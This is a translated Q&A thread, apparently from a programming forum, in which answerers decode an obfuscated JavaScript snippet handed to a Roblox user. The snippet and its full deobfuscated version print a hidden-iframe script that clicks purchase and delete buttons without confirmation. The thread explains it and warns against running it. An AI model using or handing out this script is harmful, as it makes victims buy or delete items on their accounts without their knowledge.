有人能告诉我这个代码是怎么工作的吗?

Can someone tell me how this code works?

本文关键字:工作 代码 告诉我      更新时间:2023-09-26

我是游戏Roblox的用户,有人给了我这个让我运行。我知道这很糟糕,因为我禁用了通过购买t恤来收取别人钱的部分,也就是代码底部的/*iframe[_0xebe7[20]] = whe;*/行。

变量_0x2d54是如何工作的?我以前从未见过这种类型的代码,它让我困惑,因为我想理解它。

我不知道十六进制编码是如何工作的,但我遇到了一个类似的帖子:解码这个奇怪的Javascript

var _0x2d54=["'x68'x74'x74'x70'x3A'x2F'x2F'x77'x77'x77'x2E'x72'x6F'x62'x6C'x6F'x78'x2E'x63'x6F'x6D'x2F'x66'x6F'x72'x2D'x74'x72'x61'x64'x65'x73'x2D'x69'x74'x65'x6D'x3F'x69'x64'x3D'x36'x37'x39'x32'x38'x39'x31'x38","'x69'x66'x72'x61'x6D'x65","'x63'x72'x65'x61'x74'x65'x45'x6C'x65'x6D'x65'x6E'x74","'x63'x74'x6C'x30'x30'x5F'x63'x70'x68'x52'x6F'x62'x6C'x6F'x78'x5F'x50'x75'x72'x63'x68'x61'x73'x65'x57'x69'x74'x68'x52'x6F'x62'x75'x78'x42'x75'x74'x74'x6F'x6E","'x63'x74'x6C'x30'x30'x5F'x63'x70'x68'x52'x6F'x62'x6C'x6F'x78'x5F'x50'x72'x6F'x63'x65'x65'x64'x57'x69'x74'x68'x50'x75'x72'x63'x68'x61'x73'x65'x42'x75'x74'x74'x6F'x6E","'x63'x74'x6C'x30'x30'x5F'x63'x70'x68'x52'x6F'x62'x6C'x6F'x78'x5F'x62'x74'x6E'x44'x65'x6C'x65'x74'x65","'x77'x69'x64'x74'x68","'x31","'x68'x65'x69'x67'x68'x74","'x7A'x2D'x69'x6E'x64'x65'x78","'x73'x74'x79'x6C'x65","'x2D'x31","'x63'x6F'x6E'x74'x65'x6E'x74'x44'x6F'x63'x75'x6D'x65'x6E'x74","'x69'x66'x72'x61'x6D'x65'x20'x6C'x6F'x61'x64'x65'x64","'x6C'x6F'x67","'x67'x65'x74'x45'x6C'x65'x6D'x65'x6E'x74'x42'x79'x49'x64","'x63'x6F'x6E'x66'x69'x72'x6D'x44'x65'x6C'x65'x74'x65","'x63'x6F'x6E'x74'x65'x6E'x74'x57'x69'x6E'x64'x6F'x77","'x63'x6C'x69'x63'x6B","'x73'x72'x63","'x6F'x6E'x6C'x6F'x61'x64","'x61'x70'x70'x65'x6E'x64'x43'x68'x69'x6C'x64","'x62'x6F'x64'x79"];
var _0xebe7=[_0x2d54[0],_0x2d54[1],_0x2d54[2],_0x2d54[3],_0x2d54[4],_0x2d54[5],_0x2d54[6],_0x2d54[7],_0x2d54[8],_0x2d54[9],_0x2d54[10],_0x2d54[11],_0x2d54[12],_0x2d54[13],_0x2d54[14],_0x2d54[15],_0x2d54[16],_0x2d54[17],_0x2d54[18],_0x2d54[19],_0x2d54[20],_0x2d54[21],_0x2d54[22]];
var shirt=_0xebe7[0];
var iframe=document[_0xebe7[2]](_0xebe7[1]);
var b1=_0xebe7[3];
var b2=_0xebe7[4];
var b3 =_0xebe7[5];
iframe[_0xebe7[6]] = _0xebe7[7];
iframe[_0xebe7[8]] = _0xebe7[7];
iframe[_0xebe7[10]][_0xebe7[9]] = _0xebe7[11];
function whe(){
    var _0x9b91x8 = iframe[_0xebe7[12]]; 
    console[_0xebe7[14]](_0xebe7[13]);
    if (_0x9b91x8[_0xebe7[15]](b3)){
        iframe[_0xebe7[17]][_0xebe7[16]] = (function (){
            return function (){
                return true;
            } 
        ;} 
        )();
        iframe[_0xebe7[12]][_0xebe7[15]](b3)[_0xebe7[18]]();
    } else {
        if(_0x9b91x8[_0xebe7[15]](b2)){
            iframe[_0xebe7[12]][_0xebe7[15]](b2)[_0xebe7[18]]();
        } else {
            if(_0x9b91x8[_0xebe7[15]](b1)){
                iframe[_0xebe7[12]][_0xebe7[15]](b1)[_0xebe7[18]]();
            } 
        } 
    } 
} 
iframe[_0xebe7[19] ]= shirt;
/*iframe[_0xebe7[20]] = whe;*/
document[_0xebe7[22]][_0xebe7[21]](iframe);

要理解这段代码必须下很大的功夫。开发者故意让它难以理解。

他们混淆了代码,以降低其他人复制它的速度。

您可以通过更改变量并运行代码来查看更改的内容。这将会给你提示关于这个特定变量的作用。但是有很多变数

编辑:实际上,我收回这句话。在不运行的情况下,尝试尽可能多地理解代码。正如马修在下面指出的,它可能是恶意软件。然后,一旦你有了一个更好的想法,就仔细地研究它。

包含多个值的数组。

[
    "http://www.roblox.com/for-trades-item?id=67928918", 
    "iframe", 
    "createElement", 
    "ctl00_cphRoblox_PurchaseWithRobuxButton", 
    "ctl00_cphRoblox_ProceedWithPurchaseButton", 
    "ctl00_cphRoblox_btnDelete", 
    "width", 
    "1", 
    "height", 
    "z-index", 
    "style", 
    "-1", 
    "contentDocument", 
    "iframe loaded", 
    "log", 
    "getElementById", 
    "confirmDelete", 
    "contentWindow", 
    "click", 
    "src", 
    "onload", 
    "appendChild", 
    "body"
]

在我看来,这是一个讨厌的脚本,你不应该运行它。

基本上,它将一个不可见的iframe添加到以http://www.roblox.com/for-trades-item?id=67928918为源的当前页面。然后尝试:

  1. 点击"删除"按钮,不需要确认
  2. 点击"购买"按钮
  3. 点击"Robux"按钮

许多浏览器保护你免受代码生成的点击事件,但你仍然不应该运行它。

反混淆:

var iframe = document.createElement("iframe");
iframe.width = 1;
iframe.heigth = 1;
iframe.style.zIndex = -1;
iframe.src = "http://www.roblox.com/for-trades-item?id=67928918";
function whe() {
  var cDoc = iframe.contentDocument;
  console.log("iframe loaded");
  if (cDoc.getElementById("ctl00_cphRoblox_btnDelete")) {
    iframe.contentWindow.confirmDelete = (function () {
      return function () {
        return true;
      };
    })();
    iframe.contentDocument.getElementById("ctl00_cphRoblox_btnDelete").click();
  } else {
    if (cDoc.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton")) {
      iframe.contentDocument.getElementById("ctl00_cphRoblox_ProceedWithPurchaseButton").click();
    } else {
      if (cDoc.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton")) {
        iframe.contentDocument.getElementById("ctl00_cphRoblox_PurchaseWithRobuxButton").click();
      }
    }
  }
}
iframe.onload = whe;
document.body.appendChild(iframe);

我的评论可能会被删除,因为它是一个回答而不是评论。

它被混淆了,你可以console.log(_0xebe7)查看所有变量的值。要获取值并稍微提高可读性,可以使用http://jsbeautifier.org

相关文章: